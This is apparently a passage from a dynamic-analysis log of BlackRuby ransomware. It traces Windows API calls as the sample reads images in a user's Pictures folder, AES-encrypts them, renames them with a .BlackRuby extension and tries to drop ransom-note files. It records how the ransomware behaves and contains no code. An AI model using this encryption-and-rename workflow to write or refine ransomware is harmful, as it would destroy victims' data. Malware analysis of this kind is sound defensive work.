returned 1 [0061.299] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.299] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.300] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\H9MA.png", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\H9MA.png", lpFilePart=0x0) returned 0x33 [0061.300] GetLastError () returned 0x0 [0061.300] SetErrorMode (uMode=0x1) returned 0x0 [0061.300] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\H9MA.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\h9ma.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.301] GetLastError () returned 0xb7 [0061.301] GetFileType (hFile=0x258) returned 0x1 [0061.301] SetErrorMode (uMode=0x0) returned 0x1 [0061.301] GetFileType (hFile=0x258) returned 0x1 [0061.301] WriteFile (in: hFile=0x258, lpBuffer=0x1b494d8*, nNumberOfBytesToWrite=0x12180, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1b494d8*, lpNumberOfBytesWritten=0x18ed24*=0x12180, lpOverlapped=0x0) returned 1 [0061.303] GetLastError () returned 0xb7 [0061.303] CloseHandle (hObject=0x258) returned 1 [0061.304] GetLastError () returned 0xb7 [0061.304] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\H9MA.png", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\H9MA.png", lpFilePart=0x0) returned 0x33 [0061.304] GetLastError () returned 0xb7 [0061.304] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_RI2KXMiaMySkD5zEJRPOq4ZfEmeN2z4gfWQP62K3Z.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_RI2KXMiaMySkD5zEJRPOq4ZfEmeN2z4gfWQP62K3Z.BlackRuby", lpFilePart=0x0) returned 0x68 [0061.304] GetLastError () returned 0xb7 [0061.304] SetErrorMode (uMode=0x1) returned 0x0 [0061.304] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\H9MA.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\h9ma.png"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aab7e30, ftCreationTime.dwHighDateTime=0x1d34e3e, ftLastAccessTime.dwLowDateTime=0xa3578b80, ftLastAccessTime.dwHighDateTime=0x1d35529, ftLastWriteTime.dwLowDateTime=0x2cbbabc0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x12180)) returned 1 [0061.304] GetLastError () returned 0xb7 [0061.304] SetErrorMode (uMode=0x0) returned 0x1 [0061.304] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\H9MA.png" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\h9ma.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_RI2KXMiaMySkD5zEJRPOq4ZfEmeN2z4gfWQP62K3Z.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\encrypted_ri2kxmiamyskd5zejrpoq4zfemen2z4gfwqp62k3z.blackruby")) returned 1 [0061.308] GetLastError () returned 0xb7 [0061.308] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0061.308] GetLastError () returned 0xb7 [0061.308] SetErrorMode (uMode=0x1) returned 0x0 [0061.308] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.308] GetLastError () returned 0x5 [0061.310] SetErrorMode (uMode=0x0) returned 0x1 [0061.310] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", lpFilePart=0x0) returned 0x37 [0061.310] GetLastError () returned 0x5 [0061.310] SetErrorMode (uMode=0x1) returned 0x0 [0061.310] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\ovx5xovn.gif"), fInfoLevelId=0x0, lpFileInformation=0x1b78970 | out: lpFileInformation=0x1b78970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bd248d0, ftCreationTime.dwHighDateTime=0x1d35708, ftLastAccessTime.dwLowDateTime=0x89829730, ftLastAccessTime.dwHighDateTime=0x1d34b20, ftLastWriteTime.dwLowDateTime=0x89829730, ftLastWriteTime.dwHighDateTime=0x1d34b20, nFileSizeHigh=0x0, nFileSizeLow=0x2799)) returned 1 [0061.310] GetLastError () returned 0x5 [0061.310] SetErrorMode (uMode=0x0) returned 0x1 [0061.311] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", lpFilePart=0x0) returned 0x37 [0061.311] GetLastError () returned 0x5 [0061.311] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", lpFilePart=0x0) returned 0x37 [0061.311] GetLastError () returned 0x5 [0061.311] SetErrorMode (uMode=0x1) returned 0x0 [0061.311] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\ovx5xovn.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.311] GetLastError () returned 0x0 [0061.311] GetFileType (hFile=0x258) returned 0x1 [0061.311] SetErrorMode (uMode=0x0) returned 0x1 [0061.311] GetFileType (hFile=0x258) returned 0x1 [0061.311] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x2799 [0061.311] GetLastError () returned 0x0 [0061.311] ReadFile (in: hFile=0x258, lpBuffer=0x1b7a920, nNumberOfBytesToRead=0x2799, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1b7a920*, lpNumberOfBytesRead=0x18ed18*=0x2799, lpOverlapped=0x0) returned 1 [0061.312] GetLastError () returned 0x0 [0061.312] CloseHandle (hObject=0x258) returned 1 [0061.312] GetLastError () returned 0x0 [0061.312] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", lpFilePart=0x0) returned 0x37 [0061.312] GetLastError () returned 0x0 [0061.312] SetErrorMode (uMode=0x1) returned 0x0 [0061.312] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\ovx5xovn.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bd248d0, ftCreationTime.dwHighDateTime=0x1d35708, ftLastAccessTime.dwLowDateTime=0x89829730, ftLastAccessTime.dwHighDateTime=0x1d34b20, ftLastWriteTime.dwLowDateTime=0x89829730, ftLastWriteTime.dwHighDateTime=0x1d34b20, nFileSizeHigh=0x0, nFileSizeLow=0x2799)) returned 1 [0061.312] GetLastError () returned 0x0 [0061.312] SetErrorMode (uMode=0x0) returned 0x1 [0061.312] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0061.313] GetLastError () returned 0x0 [0061.346] CryptImportKey (in: hProv=0x37c790, pbData=0x1bd9c10, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360fa0) returned 1 [0061.346] GetLastError () returned 0x0 [0061.346] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.346] GetLastError () returned 0x0 [0061.351] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.351] GetLastError () returned 0x0 [0061.351] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360ae0) returned 1 [0061.351] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.351] GetLastError () returned 0x0 [0061.351] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1c06c5c*=0x1, dwFlags=0x0) returned 1 [0061.351] GetLastError () returned 0x0 [0061.351] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1c06c28, dwFlags=0x0) returned 1 [0061.352] GetLastError () returned 0x0 [0061.352] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c06ca4*, pdwDataLen=0x18ed08*=0x2890, dwBufLen=0x2890 | out: pbData=0x1c06ca4*, pdwDataLen=0x18ed08*=0x2890) returned 1 [0061.352] GetLastError () returned 0x0 [0061.352] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c0bdf0*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c0bdf0*, pdwDataLen=0x18ed20*=0x10) returned 1 [0061.352] GetLastError () returned 0x0 [0061.352] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c0be20*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c0be20*, pdwDataLen=0x18ed28*=0x10) returned 1 [0061.352] GetLastError () returned 0x0 [0061.352] CryptDestroyKey (hKey=0x360fa0) returned 1 [0061.352] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.352] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.352] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", lpFilePart=0x0) returned 0x37 [0061.352] GetLastError () returned 0x0 [0061.352] SetErrorMode (uMode=0x1) returned 0x0 [0061.352] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\ovx5xovn.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.353] GetLastError () returned 0xb7 [0061.353] GetFileType (hFile=0x258) returned 0x1 [0061.353] SetErrorMode (uMode=0x0) returned 0x1 [0061.353] GetFileType (hFile=0x258) returned 0x1 [0061.354] CloseHandle (hObject=0x258) returned 1 [0061.354] GetLastError () returned 0xb7 [0061.354] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif", lpFilePart=0x0) returned 0x37 [0061.354] GetLastError () returned 0xb7 [0061.354] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_WxdKdGGQnof4KlMGXHPWSIPhAQrwzRD9SLl6DKvpBsa.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_WxdKdGGQnof4KlMGXHPWSIPhAQrwzRD9SLl6DKvpBsa.BlackRuby", lpFilePart=0x0) returned 0x6a [0061.354] GetLastError () returned 0xb7 [0061.354] SetErrorMode (uMode=0x1) returned 0x0 [0061.354] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\ovx5xovn.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bd248d0, ftCreationTime.dwHighDateTime=0x1d35708, ftLastAccessTime.dwLowDateTime=0x89829730, ftLastAccessTime.dwHighDateTime=0x1d34b20, ftLastWriteTime.dwLowDateTime=0x2cc2cfe0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x28a0)) returned 1 [0061.354] GetLastError () returned 0xb7 [0061.354] SetErrorMode (uMode=0x0) returned 0x1 [0061.354] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\ovx5XOVN.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\ovx5xovn.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_WxdKdGGQnof4KlMGXHPWSIPhAQrwzRD9SLl6DKvpBsa.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\encrypted_wxdkdggqnof4klmgxhpwsiphaqrwzrd9sll6dkvpbsa.blackruby")) returned 1 [0061.355] GetLastError () returned 0xb7 [0061.355] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0061.355] GetLastError () returned 0xb7 [0061.355] SetErrorMode (uMode=0x1) returned 0x0 [0061.355] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.355] GetLastError () returned 0x5 [0061.356] SetErrorMode (uMode=0x0) returned 0x1 [0061.356] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif", lpFilePart=0x0) returned 0x42 [0061.356] GetLastError () returned 0x5 [0061.356] SetErrorMode (uMode=0x1) returned 0x0 [0061.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\s279emzzqyey_8xksze.gif"), fInfoLevelId=0x0, lpFileInformation=0x1c30b5c | out: lpFileInformation=0x1c30b5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7c0f620, ftCreationTime.dwHighDateTime=0x1d35178, ftLastAccessTime.dwLowDateTime=0x96fd3ac0, ftLastAccessTime.dwHighDateTime=0x1d3574e, ftLastWriteTime.dwLowDateTime=0x96fd3ac0, ftLastWriteTime.dwHighDateTime=0x1d3574e, nFileSizeHigh=0x0, nFileSizeLow=0x77c0)) returned 1 [0061.356] GetLastError () returned 0x5 [0061.356] SetErrorMode (uMode=0x0) returned 0x1 [0061.357] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif", lpFilePart=0x0) returned 0x42 [0061.357] GetLastError () returned 0x5 [0061.357] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif", lpFilePart=0x0) returned 0x42 [0061.357] GetLastError () returned 0x5 [0061.357] SetErrorMode (uMode=0x1) returned 0x0 [0061.357] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\s279emzzqyey_8xksze.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.357] GetLastError () returned 0x0 [0061.357] GetFileType (hFile=0x258) returned 0x1 [0061.357] SetErrorMode (uMode=0x0) returned 0x1 [0061.357] GetFileType (hFile=0x258) returned 0x1 [0061.357] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x77c0 [0061.357] GetLastError () returned 0x0 [0061.357] ReadFile (in: hFile=0x258, lpBuffer=0x1c3279c, nNumberOfBytesToRead=0x77c0, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c3279c*, lpNumberOfBytesRead=0x18ed18*=0x77c0, lpOverlapped=0x0) returned 1 [0061.363] GetLastError () returned 0x0 [0061.363] CloseHandle (hObject=0x258) returned 1 [0061.363] GetLastError () returned 0x0 [0061.363] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif", lpFilePart=0x0) returned 0x42 [0061.363] GetLastError () returned 0x0 [0061.363] SetErrorMode (uMode=0x1) returned 0x0 [0061.364] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\s279emzzqyey_8xksze.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7c0f620, ftCreationTime.dwHighDateTime=0x1d35178, ftLastAccessTime.dwLowDateTime=0x96fd3ac0, ftLastAccessTime.dwHighDateTime=0x1d3574e, ftLastWriteTime.dwLowDateTime=0x96fd3ac0, ftLastWriteTime.dwHighDateTime=0x1d3574e, nFileSizeHigh=0x0, nFileSizeLow=0x77c0)) returned 1 [0061.364] GetLastError () returned 0x0 [0061.364] SetErrorMode (uMode=0x0) returned 0x1 [0061.374] CryptImportKey (in: hProv=0x37c818, pbData=0x1c9bb10, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360f20) returned 1 [0061.374] GetLastError () returned 0x0 [0061.374] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.374] GetLastError () returned 0x0 [0061.380] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.380] GetLastError () returned 0x0 [0061.380] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360f60) returned 1 [0061.380] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.380] GetLastError () returned 0x0 [0061.380] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1cc8b5c*=0x1, dwFlags=0x0) returned 1 [0061.380] GetLastError () returned 0x0 [0061.380] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1cc8b28, dwFlags=0x0) returned 1 [0061.380] GetLastError () returned 0x0 [0061.380] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc8ba4*, pdwDataLen=0x18ed08*=0x78c0, dwBufLen=0x78c0 | out: pbData=0x1cc8ba4*, pdwDataLen=0x18ed08*=0x78c0) returned 1 [0061.380] GetLastError () returned 0x0 [0061.380] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd7d50*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1cd7d50*, pdwDataLen=0x18ed20*=0x10) returned 1 [0061.380] GetLastError () returned 0x0 [0061.380] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cd7d80*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1cd7d80*, pdwDataLen=0x18ed28*=0x10) returned 1 [0061.380] GetLastError () returned 0x0 [0061.380] CryptDestroyKey (hKey=0x360f20) returned 1 [0061.380] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.380] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.380] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif", lpFilePart=0x0) returned 0x42 [0061.380] GetLastError () returned 0x0 [0061.380] SetErrorMode (uMode=0x1) returned 0x0 [0061.381] GetFileType (hFile=0x258) returned 0x1 [0061.381] GetFileType (hFile=0x258) returned 0x1 [0061.383] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\S279EMZZQYEy_8xksze.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\s279emzzqyey_8xksze.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_JofYhJqE9RMMmfi1fYclzFpJOpyvqnb3dkn2EN.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\encrypted_jofyhjqe9rmmmfi1fyclzfpjopyvqnb3dkn2en.blackruby")) returned 1 [0061.383] GetLastError () returned 0xb7 [0061.384] SetErrorMode (uMode=0x0) returned 0x1 [0061.385] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f20 [0061.385] GetLastError () returned 0x5 [0061.385] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.385] GetLastError () returned 0x5 [0061.385] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.385] GetLastError () returned 0x5 [0061.385] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.385] GetLastError () returned 0x5 [0061.385] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.385] GetLastError () returned 0x5 [0061.385] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.385] GetLastError () returned 0x5 [0061.385] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.385] GetLastError () returned 0x5 [0061.386] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.386] GetLastError () returned 0x5 [0061.386] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.386] GetLastError () returned 0x5 [0061.386] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.386] GetLastError () returned 0x12 [0061.386] FindClose (in: hFindFile=0x360f20 | out: hFindFile=0x360f20) returned 1 [0061.386] SetErrorMode (uMode=0x0) returned 0x1 [0061.386] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX", lpFilePart=0x0) returned 0x36 [0061.386] GetLastError () returned 0x12 [0061.386] SetErrorMode (uMode=0x1) returned 0x0 [0061.386] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f20 [0061.386] GetLastError () returned 0x12 [0061.386] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.386] GetLastError () returned 0x12 [0061.387] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.387] GetLastError () returned 0x12 [0061.387] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.387] GetLastError () returned 0x12 [0061.387] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.387] GetLastError () returned 0x12 [0061.387] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.387] GetLastError () returned 0x12 [0061.387] FindNextFileW (in: hFindFile=0x360f20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.387] GetLastError () returned 0x12 [0061.387] 